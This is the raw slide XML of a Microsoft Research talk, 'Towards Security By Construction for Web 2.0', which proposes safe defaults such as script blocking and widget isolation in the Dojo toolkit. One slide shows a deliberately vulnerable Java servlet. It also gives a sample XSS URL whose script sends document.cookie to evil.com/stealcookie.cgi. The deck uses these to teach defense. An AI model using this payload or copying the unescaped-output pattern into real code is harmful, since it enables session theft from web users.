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9" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="278" r:id="rId8"/>
    <p:sldId id="267" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="276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1" autoAdjust="0"/>
    <p:restoredTop sz="94660" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-34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B6D5D-E540-4395-A443-F9749726F167}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/24/2007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55B0E-AFFA-4926-8BC7-82294BD8E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0F49-A047-47E0-AF07-B822777AFF0A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/24/2007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283B-A993-4BEC-8D1F-A8E984E83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2667000"/>
            <a:ext cx="9143999" cy="2468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lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:defRPr sz="47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F556-7382-4FD1-95B4-5AA916FC4C3F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E3583A9E-ED20-45ED-9568-A790BB115D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0" y="2621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6FB9-6D3E-4A9B-8244-CC46344692E5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E7F-16B9-4EB4-8EA8-7AFB4F2E0263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686-CDFC-44B5-824D-EAE6E96FD37C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0687-C46C-4D34-921F-D4E3D63FAC34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7CB-C74C-4317-A144-B0E82D3CA614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4BB2-47D1-4345-B632-3D21C6217C30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D616-B347-4995-911C-55A0EABB7034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2058-D6B1-4781-936D-12CECA8561BB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BAE1-7EB3-4FF2-A0A8-E3CEC71D55B2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DB4AD9-213C-40E5-9307-E9671D6D5C14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fld id="{5BF2CB8C-FD17-4B96-9852-0C3C0129CD02}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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fld id="{E7525148-E385-491E-BAAB-B857DBE5E6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ctim.com/?userna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a.ckers.org/xs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8077200" cy="22098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r">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Towards Security By Construction</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for Web 2.0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5257800"/>
            <a:ext cx="8077200" cy="149961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800" b="1" dirty="0" smtClean="0"/>
              <a:t>Ben Livshits and Úlfar Erlingsson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Microsoft Research</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Client (Dojo Toolkit)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7313"/>
            <a:ext cx="6949442" cy="45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133600" y="4572000"/>
            <a:ext cx="5867400" cy="1828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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="2362200"/>
            <a:ext cx="3429000" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32222"/>
              <a:gd name="adj2" fmla="val 59598"/>
            </a:avLst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Don’t want to allow JavaScript, either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(this is how Yahoo! email worm came about)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Declaring a No-script Content Pane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590800"/>
            <a:ext cx="8229600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&lt;div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id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contentPane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dojoType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ContentPane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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sizeMin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="20" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeShare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="80" 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href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="Mail/MailAccount.html“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protection=“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noscript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”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&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1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953000" y="1905000"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63261"/>
              <a:gd name="adj2" fmla="val 10554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Type of widget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4267200"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38110"/>
              <a:gd name="adj2" fmla="val -13355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HTML contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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362200" y="4800600"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17136"/>
              <a:gd name="adj2" fmla="val -1618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Desired type of protection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352800"/>
            <a:ext cx="30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8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How to implement this? Modify the browser [BEEP]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80772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Safe Default # 2:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide Content and Code Isolation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3A9E-ED20-45ED-9568-A790BB115D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Dojo Toolkit Email Client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7313"/>
            <a:ext cx="6949442" cy="4587774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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133600" y="4572000"/>
            <a:ext cx="5867400" cy="1828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886200" y="5638800"/>
            <a:ext cx="609600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -128851"/>
              <a:gd name="adj2" fmla="val -13938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orchid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800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4495800"/>
            <a:ext cx="4800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&lt;td background=‘orchid’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</a:rPr>
              <a:t>onmouseover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=“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showTooltip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(‘orchid’)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”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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10" name="Striped Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5829301" y="3619499"/>
            <a:ext cx="1447799" cy="10668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Multiply 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="3886200"/>
            <a:ext cx="1752600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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Mash-up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Page Isolation Boundaries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457607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triped Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4800600" y="3429001"/>
            <a:ext cx="2971800" cy="16002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  <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>eed  injection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2209800"/>
            <a:ext cx="4572000" cy="16764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038600"/>
            <a:ext cx="4572000" cy="23622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 rot="5400000">
            <a:off x="6553200" y="3505200"/>
            <a:ext cx="2971800" cy="16002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steal data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>from secure feed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Up-Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="3276600"/>
            <a:ext cx="685800" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow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3048000" y="3505200"/>
            <a:ext cx="1752600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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“Sealed” RSS News Item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514600"/>
            <a:ext cx="8229600" cy="2514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&lt;div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id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contentPane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dojoType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ContentPane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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sizeMin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="20" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeShare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="80" 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protection=“isolation”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	&lt;span&gt;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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		&lt;b&gt;Hurricane outlook is ominous&lt;/b&gt;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	&lt;/span&gt;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	...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&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1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81600" y="1676400"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63261"/>
              <a:gd name="adj2" fmla="val 10554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Type of widget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4724400"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47167"/>
              <a:gd name="adj2" fmla="val -14911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HTML contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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162800" y="2895600"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116902"/>
              <a:gd name="adj2" fmla="val 2069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Desired type of protection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743200"/>
            <a:ext cx="30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8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How to implement? Modify same-origin policy implementation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0772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Safe Default # 3:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defaults for More Complex Widgets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3A9E-ED20-45ED-9568-A790BB115DE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Widgets in Dojo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0" y="1775191"/>
            <a:ext cx="57912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Context menu is a different widget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>declared separately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>from the tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Isolation goals to accomplish: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To “Copy Inbox”, context menu has to have access to the tree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Inbox messages are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>given tree access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5" y="1790700"/>
            <a:ext cx="2085975" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg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Curved Left Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="123825" y="1943100"/>
            <a:ext cx="1143000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow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16200000">
            <a:off x="723901" y="4381500"/>
            <a:ext cx="1447799" cy="10668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Multiply 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4648201"/>
            <a:ext cx="1752600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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Dojo Tree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3048000"/>
            <a:ext cx="8229600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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listenTree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(tree) </a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var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nodes = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tree.getDescendants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 marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="3"/>
            </a:pP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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> i = 0; i &lt; nodes.length; i++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0"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(!nodes[i].isTreeNode) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin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</a:rPr>
              <a:t>6        } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.bindDomNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(nodes[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].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>labelNode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</a:rPr>
              <a:t>8     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9     ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.listenedTrees.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(tree);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>11   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1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12  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</a:rPr>
              <a:t>this.setAttribute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(’principal ’,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</a:rPr>
              <a:t>tree.getAttribute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(’principal ’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}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6002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Must explicitly allow context menu to access the tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Need to explicitly encode access control: set is as a property on object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Change framework functions to maintain it and check before allowing access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6400800" y="3733800"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87061"/>
              <a:gd name="adj2" fmla="val -194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</a:rPr>
              <a:t>Connect context menu and tree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133600" y="4800600"/>
            <a:ext cx="3505200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18445"/>
              <a:gd name="adj2" fmla="val 995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</a:rPr>
              <a:t>Give context menu the ability to access the underlying tree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Modern Ajax-based Web 2.0 applications often require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>fine-grained security guarantees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>New breed of client-side enforcement technologies require that somebody specify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to enforce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Frameworks provide a great opportunity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>to inject safe programming defaults </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>“for free”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Web Application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 application vulnerabilities more widespread than ever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The usual suspects from Web 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross site scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Ajax adds new capabilities, which can be exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript worms 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Samy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worm ‘05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Yahoo worm ‘06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prototype hijacking [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Chess et. al., 2007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is Unsafe!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1647372"/>
            <a:ext cx="7696200" cy="11720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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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</a:rPr>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“username”);</a:t>
            </a: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ServletResponseStream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out = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resp.getOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("&lt;p&gt;Hello, " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ ".&lt;/p&gt;");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3124200"/>
            <a:ext cx="7696200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bg2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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&lt;script&gt;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location =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	“http://evil.com/stealcookie.cgi?cookie= “  +	escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
